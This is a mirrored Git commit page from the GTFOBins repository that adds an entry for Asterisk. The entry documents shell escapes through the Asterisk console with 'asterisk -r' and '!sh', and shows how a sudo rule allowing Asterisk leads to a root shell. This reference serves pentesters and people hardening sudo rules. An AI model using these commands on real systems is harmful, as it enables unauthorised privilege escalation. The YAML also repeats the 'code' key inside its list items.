mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-01-01 13:11:40 +01:00
Merge f29e143475a9ee6616df0bfb65019188b61abb40 into b29f2cfde1c72e4ea5191e49604e923bbda98461
This commit is contained in:
commit
0a3991e901
18
_gtfobins/asterisk.md
Normal file
18
_gtfobins/asterisk.md
Normal file
@ -0,0 +1,18 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- description: Connect to the Asterisk console and drop into a shell
|
||||
code: |
|
||||
asterisk -r
|
||||
code: |
|
||||
!sh
|
||||
sudo:
|
||||
- description: Start Asterisk as root in the foreground to create its CLI socket
|
||||
code: |
|
||||
sudo asterisk -F
|
||||
- description: Connect to the Asterisk console as root and drop into a shell
|
||||
code: |
|
||||
sudo asterisk -r
|
||||
code: |
|
||||
!sh
|
||||
---
|
||||
Loading…
Reference in New Issue
Block a user